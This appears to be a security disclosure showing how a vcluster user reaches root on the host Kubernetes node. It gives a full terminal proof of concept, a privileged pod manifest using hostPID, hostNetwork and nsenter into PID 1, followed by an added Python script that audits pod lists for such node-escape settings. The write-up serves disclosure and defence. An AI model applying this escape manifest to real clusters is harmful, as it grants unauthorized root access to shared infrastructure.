This is pretty straightforward, don't let people you don't trust use vcluster unless you want people to have root access to your cluster nodes.
Below is a proof of concept on how to get root access as a user in a vcluster cluster.
I did the kubectl deployment documented here. The other deployments yield the same results.
vcluster-test$ kubectl create ns nesting-cluster
namespace/nesting-cluster created
vcluster-test$ kubectl -n nesting-cluster apply -f deploy_cluster.yaml
serviceaccount/vcluster-1 created
role.rbac.authorization.k8s.io/vcluster-1 created
rolebinding.rbac.authorization.k8s.io/vcluster-1 created
service/vcluster-1 created
service/vcluster-1-headless created
statefulset.apps/vcluster-1 created
vcluster-test$ kubectl -n nesting-cluster get pods
NAME READY STATUS RESTARTS AGE
coredns-66c464876b-rfcmk-x-kube-system-x-vcluster-1 1/1 Running 0 15s
vcluster-1-0 2/2 Running 0 28s
vcluster-test$ kubectl -n nesting-cluster exec -it vcluster-1-0 -- sh
Defaulted container "virtual-cluster" out of: virtual-cluster, syncer
/ # kubectl create ns nesting-cluster
namespace/nesting-cluster created
/ # cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
>   name: node-shell
> spec:
>   containers:
>   - command:
>     - nsenter
>     - --target
>     - "1"
>     - --mount
>     - --uts
>     - --ipc
>     - --net
>     - --pid
>     - --
>     - bash
>     - -c
>     - |
>       echo WELL THIS IS INSECURE > /dev/shm/hacked.txt
>     image: docker.io/library/alpine
>     imagePullPolicy: Always
>     name: nsenter
>     securityContext:
>       privileged: true
>     stdin: true
>     stdinOnce: true
>     tty: true
>   dnsPolicy: ClusterFirst
>   enableServiceLinks: true
>   hostNetwork: true
>   hostPID: true
>   nodeName: $(kubectl get nodes | grep -v ^NAME | head -n1 | awk '{print $1}')
>   preemptionPolicy: PreemptLowerPriority
>   priority: 0
>   restartPolicy: Never
> EOF
pod/node-shell created
/ # exit
vcluster-test$
vcluster-test$ kubectl node-shell docker-desktop
spawning "nsenter-mkcilr" on "docker-desktop"
If you don't see a command prompt, try pressing enter.
docker-desktop:/# cat /dev/shm/hacked.txt
WELL THIS IS INSECURE
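The settings the proof of concept relies on (hostPID, hostNetwork and a privileged container) end up in a pod that vcluster syncs into the host namespace, so an operator can spot them there. The script below is an added audit example, not part of the original report or of vcluster itself: it walks a pod list in the shape `kubectl get pods -A -o json` produces and reports every pod with node-escape settings. The sample pod list embedded in it is constructed from the manifest above; the synced pod name `node-shell-x-default-x-vcluster-1` is an assumption modelled on the `coredns-...-x-kube-system-x-vcluster-1` naming visible in the session, and the `default` namespace is assumed because the PoC applied the pod without `-n`.

```python
"""Audit Kubernetes pod specs for the node-escape settings used in the
vcluster proof of concept: hostPID, hostNetwork, hostIPC, privileged
containers and hostPath volumes. Added example, not the reporter's code.

Usage:  kubectl get pods -A -o json | python3 audit_pods.py
With no stdin, it runs against the constructed sample list below."""
from __future__ import annotations

import json
import sys

# Constructed sample: a synced copy of the PoC pod plus a benign pod.
# Names and namespace are assumptions (see lead-in), not captured data.
SAMPLE_POD_LIST = {
    "items": [
        {
            "metadata": {"name": "node-shell-x-default-x-vcluster-1",
                         "namespace": "nesting-cluster"},
            "spec": {
                "hostNetwork": True,
                "hostPID": True,
                "nodeName": "docker-desktop",
                "containers": [{
                    "name": "nsenter",
                    "image": "docker.io/library/alpine",
                    "command": ["nsenter", "--target", "1", "--mount", "--uts",
                                "--ipc", "--net", "--pid", "--", "bash"],
                    "securityContext": {"privileged": True},
                }],
            },
        },
        {
            "metadata": {"name": "web-0", "namespace": "nesting-cluster"},
            "spec": {"containers": [{"name": "web", "image": "nginx",
                                     "securityContext": {"runAsNonRoot": True}}]},
        },
    ]
}


def risky_settings(pod: dict) -> list[str]:
    """Return the node-escape settings found in one pod spec, in a fixed order."""
    spec = pod.get("spec") or {}
    findings: list[str] = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(flag)
    # Check every container kind; initContainers and ephemeralContainers are
    # easy to overlook and can be privileged just like regular containers.
    for field in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(field) or []:
            sc = c.get("securityContext") or {}
            if sc.get("privileged"):
                findings.append(f"privileged container {c.get('name', '?')}")
    for vol in spec.get("volumes") or []:
        host_path = vol.get("hostPath")
        if host_path:
            findings.append(f"hostPath volume {vol.get('name', '?')} -> "
                            f"{host_path.get('path', '?')}")
    return findings


def synced_from_vcluster(pod_name: str) -> str | None:
    """Return the vcluster name a synced pod came from, based on the
    <name>-x-<namespace>-x-<vcluster> pattern seen in the session, else None."""
    parts = pod_name.split("-x-")
    return parts[-1] if len(parts) >= 3 else None


def audit_pod_list(pod_list: dict) -> dict[str, list[str]]:
    """Map 'namespace/name' to findings for every pod that has any."""
    report: dict[str, list[str]] = {}
    for pod in pod_list.get("items") or []:
        meta = pod.get("metadata") or {}
        key = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        findings = risky_settings(pod)
        origin = synced_from_vcluster(meta.get("name", ""))
        if findings and origin:
            findings = findings + [f"synced from vcluster {origin}"]
        if findings:
            report[key] = findings
    return report


if __name__ == "__main__":
    data = SAMPLE_POD_LIST if sys.stdin.isatty() else json.load(sys.stdin)
    for key, findings in audit_pod_list(data).items():
        print(f"{key}: {', '.join(findings)}")
```

On a live cluster the report lists every pod in every namespace that could reach the node the way the PoC does, and the "synced from vcluster" tag tells you which ones a virtual-cluster user created; that is the list to compare against the people you actually trust with vcluster access.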